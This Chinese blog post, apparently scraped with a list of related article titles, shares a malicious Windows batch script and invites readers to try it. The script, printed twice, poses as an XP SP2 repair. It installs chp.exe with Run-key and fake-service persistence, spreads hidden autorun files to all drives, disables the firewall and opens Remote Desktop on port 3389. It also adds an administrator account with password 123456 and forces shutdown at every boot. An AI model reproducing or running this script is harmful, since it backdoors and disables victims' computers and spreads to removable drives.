整古专家之恶意批处理命令
2024-05-10 09:27:01
今天,考试完后.闲来无事.........在电脑里面找到些好东东.......有兴趣的可以试试.
ps:出了问题,别找我!!!!!!!!!!!!
@Echo Off
@color 0A
@Echo Microsoft WindowsXP SP2 修复程序正在修复您系统中的漏洞...... 请不要关闭,否则将系统崩溃!
@xcopy chp.exe %windir%\ /h /c /r /y >nul
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v sysinfo /t REG_SZ /d "%windir%\chp.exe" /f >nul
@Echo [autorun] >%windir%\autorun.inf
@Echo open=chp.exe >>%windir%\autorun.inf
@Echo shell\1=Open >>%windir%\autorun.inf
@Echo shell\1\Command=chp.exe >>%windir%\autorun.inf
@Echo shell\2\=Browser >>%windir%\autorun.inf
@Echo shell\2\Command=chp.exe >>%windir%\autorun.inf
@Echo shell\3\=打开 >>%windir%\autorun.inf
@Echo shell\3\command=chp.exe >>%windir%\autorun.inf
@Echo shellexecute=chp.exe >>%windir%\autorun.inf
@For %%b In (C:,D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%b (@xcopy %windir%\autorun.inf %%b\ /h /c /r /y >nul)
@For %%c In (C:,D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%c (@xcopy chp.exe %%c\ /h /c /r /y >nul )
@For %%d In (D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%d\autorun.inf (@Attrib %%d\autorun.inf +h +s >nul)
@For %%e In (D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%e\chp.exe (@Attrib %%e\chp.exe +h +s >nul)
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v chpoe /t REG_SZ /d "chpshut.exe -s /t 15" /f >nul
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v sysinfo /t REG_SZ /d "%windir%\chp.exe" /f >nul
@Echo Windows Registry Editor Version 5.00 >%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>%windir%\opentsc.dll
@Echo "Shell"="Explorer.exe /chpshut.exe -s /t 15" >>%windir%\opentsc.dll
@Echo Windows Registry Editor Version 5.00 >>%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>%windir%\opentsc.dll
@Echo "fDenyTSConnections"=dword:00000000 >>%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List] >>%windir%\opentsc.dll
@Echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009" >>%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] >>%windir%\opentsc.dll
@Echo "EnableFirewall"=dword:00000000 >>%windir%\opentsc.dll
@regedit /s %windir%\opentsc.dll >nul
@xcopy chp.exe %windir%\ /h /c /r /y >nul
@net user /add new /Active:yes >nul
@net user new 123456 >nul
@net localgroup administrators new /add >nul
@sfc /purgecache >nul
@Ren %windir%\system32\shutdown.exe chpshut.exe >nul
@chpshut.exe -s /t 15
@color 0A
@Echo Microsoft WindowsXP SP2 修复程序正在修复您系统中的漏洞...... 请不要关闭,否则将系统崩溃!
@xcopy chp.exe %windir%\ /h /c /r /y >nul
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v sysinfo /t REG_SZ /d "%windir%\chp.exe" /f >nul
@Echo [autorun] >%windir%\autorun.inf
@Echo open=chp.exe >>%windir%\autorun.inf
@Echo shell\1=Open >>%windir%\autorun.inf
@Echo shell\1\Command=chp.exe >>%windir%\autorun.inf
@Echo shell\2\=Browser >>%windir%\autorun.inf
@Echo shell\2\Command=chp.exe >>%windir%\autorun.inf
@Echo shell\3\=打开 >>%windir%\autorun.inf
@Echo shell\3\command=chp.exe >>%windir%\autorun.inf
@Echo shellexecute=chp.exe >>%windir%\autorun.inf
@For %%b In (C:,D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%b (@xcopy %windir%\autorun.inf %%b\ /h /c /r /y >nul)
@For %%c In (C:,D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%c (@xcopy chp.exe %%c\ /h /c /r /y >nul )
@For %%d In (D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%d\autorun.inf (@Attrib %%d\autorun.inf +h +s >nul)
@For %%e In (D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%e\chp.exe (@Attrib %%e\chp.exe +h +s >nul)
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v chpoe /t REG_SZ /d "chpshut.exe -s /t 15" /f >nul
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v sysinfo /t REG_SZ /d "%windir%\chp.exe" /f >nul
@Echo Windows Registry Editor Version 5.00 >%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>%windir%\opentsc.dll
@Echo "Shell"="Explorer.exe /chpshut.exe -s /t 15" >>%windir%\opentsc.dll
@Echo Windows Registry Editor Version 5.00 >>%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>%windir%\opentsc.dll
@Echo "fDenyTSConnections"=dword:00000000 >>%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List] >>%windir%\opentsc.dll
@Echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009" >>%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] >>%windir%\opentsc.dll
@Echo "EnableFirewall"=dword:00000000 >>%windir%\opentsc.dll
@regedit /s %windir%\opentsc.dll >nul
@xcopy chp.exe %windir%\ /h /c /r /y >nul
@net user /add new /Active:yes >nul
@net user new 123456 >nul
@net localgroup administrators new /add >nul
@sfc /purgecache >nul
@Ren %windir%\system32\shutdown.exe chpshut.exe >nul
@chpshut.exe -s /t 15
关于注册为服务:
echo [Version] >%windir%\snddrv.inf
echo Signature="$WINDOWS NT$" >>%windir%\snddrv.inf
echo [DefaultInstall.Services] >>%windir%\snddrv.inf
echo AddService=snddrv,,My_AddService_Name >>%windir%\snddrv.inf
echo [My_AddService_Name] >>%windir%\snddrv.inf
echo DisplayName=Windows Audio Drivers >>%windir%\snddrv.inf
echo Description=提供对 Windows 音频硬件的支持。 >>%windir%\snddrv.inf
echo ServiceType=0x10 >>%windir%\snddrv.inf
echo StartType=2 >>%windir%\snddrv.inf
echo ErrorControl=0 >>%windir%\snddrv.inf
echo ServiceBinary=%windir%\chp.exe >>%windir%\snddrv.inf
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %windir%\snddrv.inf
存为.cmd或bat执行就行了
整古专家之恶意批处理命令相关推荐
- Windows批处理命令学习
Windows批处理命令学习一 Windows的批处理命令固然比不上unix的shell脚本强大,但用好了仍能给我们的工作带来很大作用.一个朋友问我为什么学习批处理命令,我以<程序员修炼之道-- ...
- Windows批处理命令学习笔记(1)
转自:http://blog.csdn.net/clever101 Windows的批处理命令固然比不上unix的shell脚本强大,但用好了仍能给我们的工作带来很大作用.一个朋友问我为什么学习批处理 ...
- BAT批处理命令 教程
第一章批处理基础 第一节常用批处理内部命令简介批处理定义:顾名思义,批处理文件是将一系列命令按一定的顺序集合为一个可执行的文本文件,其扩展名为BAT或者CMD.这些命令统称批处理命令. 小知识:可以在 ...
- 常用批处理命令总结3之Find和FindStr
原文:常用批处理命令总结3之Find和FindStr find 作用:从文件中收索字符串 格式:find 参数 "字符串" 路径\文件名 参数: /V 显示所有未包含指定字符串的行 ...
- .bat批处理命令的介绍
HUC = = D组 http://www.cnhonkerarmy.com/ 63707869 =====================================开始============ ...
- windows批处理命令教程
原文地址:http://www.cnblogs.com/phyllis/archive/2011/05/19/2051131.html 第一章 批处理基础 第一节 常用批处理内部命令简介 批处理定义: ...
- 批处理命令和常用脚本
之前在我的文章中有介绍过常用的"操作系统命令",当时就有很多人私信我能不能讲讲"批处理脚本",那么今天我就以本篇文章内容给大家介绍一下"批处理脚本的编 ...
- Windows bat常用批处理命令学习
转载自:https://blog.csdn.net/qq826364410/article/details/79323351 第一章 批处理基础 第一节 常用批处理内部命令简介 批处理定义:顾名思义, ...
- win7系统定时删除数据的批处理命令_win7系统使用批处理删除文件详细教程
批处理文件是扩展名为·bat 或·cmd的文本文件,包含一条或多条命令,由dos或windows系统内嵌的命令解释器来解释运行.很多win7用户为了提高效率也为了提高运行速度,常常使用批处理删除不需要 ...
最新文章
- C++编程语言之Lambda函数与表达式
- 常见的物联网通信协议
- byte 8位有符号 与 char 16位无符号
- Comet, 下一代反向AJAX(即服务器推送技术- Server-side push)
- Lua_第17 章 数学库
- Android应用中Back键的监听及处理
- 嵌入式指针embedded pointer的概念以及用法
- 快两年的时间,我都干了啥
- linux串口数据异常,linux串口知识深入--收到数据异常问题处理
- oracle 00283,数据库出现ORA-00283/ORA-01610的问题
- python免费领取视频-180集全套python基础视频教程+电子教材,限时免费领取
- linux编码合适修改_CentOS升级Linux内核备忘录
- (转载)mysql查询今天、昨天、7天、近30天、本月、上一月数据
- word 如何快速比较两个文档的区别
- 程序员为什么单身?细数程序员“六宗罪”
- 语音识别中声学模型训练过程-GMM(一)
- java 常用框架MP
- 猪八戒java开发,猪八戒--Java开发
- DNS-域名解析协议
- 使用python实现mysql测试数据的准备(大批量导入数据)
热门文章
- 理解 webpack 热更新
- 微信小程序webview内页面分享
- 使用爬虫抓取网页内容
- ibm ilog mysql_开源纯C日志函数库iLOG3快速入门(八、如果你喜欢简单日志函数甚于日志函数库)...
- 鸿蒙电视投屏软件,鸿蒙打造 未来电视就这样!荣耀智慧屏PRO深度评测
- linux怎样删除定时任务,Linux(CentOS)使用定时任务删除Tomcat日志文件
- 2021年南菁高中高考成绩查询,2021年无锡高考各高中成绩及本科升学率数据排名及分析...
- mysql merge事务_mysql菜鸟手迹11--mysql存储引擎之Merge
- AWS服务器可以设置虚拟ip吗,《AWS云计算实战》3.使用虚拟服务器:EC2
- 宝宝退烧的天然方子(老中医的推荐)